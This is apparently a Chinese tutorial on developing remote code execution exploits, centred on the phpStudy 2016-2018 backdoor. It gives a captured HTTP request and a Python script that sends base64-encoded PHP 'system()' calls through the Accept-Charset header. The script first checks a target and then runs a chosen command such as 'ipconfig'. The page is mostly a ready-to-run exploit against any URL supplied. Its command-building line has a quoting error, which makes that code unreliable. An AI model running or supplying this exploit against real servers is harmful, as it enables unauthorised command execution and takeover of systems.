![image-20230921162121354](https://img-blog.csdnimg.cn/img_convert/ec145b34fef6d47504369d005a13357e.png)
针对RCE漏洞开发EXP
常见的RCE漏洞:
phpstudy_2016-2018_rce
seacms_6.26-6.28_rce
sangfor_edr_3.2.19_rce
phpstudy_2016-2018_rce漏洞复现
- 对“http://192.168.17.132/phpinfo.php”进行抓包
- 对进行漏洞利用的语句进行base64编码
phpstudy_2016-2018_rce漏洞检验脚本
#http请求
'''
GET /phpinfo.php HTTP/1.1
Host: 192.168.17.134
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.17.134/
Accept-Encoding: gzip,deflate
Accept-Charset: c3lzdGVtKCJpcGNvbmZpZyIpOw==
Accept-Language: en-US,en;q=0.9
Connection: close
'''
import requests
import sys
import base64
try:
url = sys.argv[1]
except:
print("[+] Usage: Python *.py http://192.168.17.134/phpinfo.php")
exit()
print(f"[+] Target: {url}")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
"Accept-Encoding": "gzip,deflate",
"Accept-Charset": "c3lzdGVtKCJnbGYiKTs="
}
res = requests.get(url = url,headers= headers)
result = res.text[:res.text.find("<!DOCTYPE html PUBLIC>")]
if "glf" in result:
print(f"[*] Target {url} is VULNERRABLE!")
else:
print(f"[*] Target {url} is NOT VULNERRABLE!")
cmd = "ipconfig"
cmd = f"system('{cmd});"
cmd = base64.b64encode(cmd.encode()).decode()
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
"Accept-Encoding": "gzip,deflate",
"Accept-Charset": cmd
}
res = requests.get(url = url,headers= headers)
result = res.text[:res.text.find("<!DOCTYPE html PUBLIC>")]
print(result)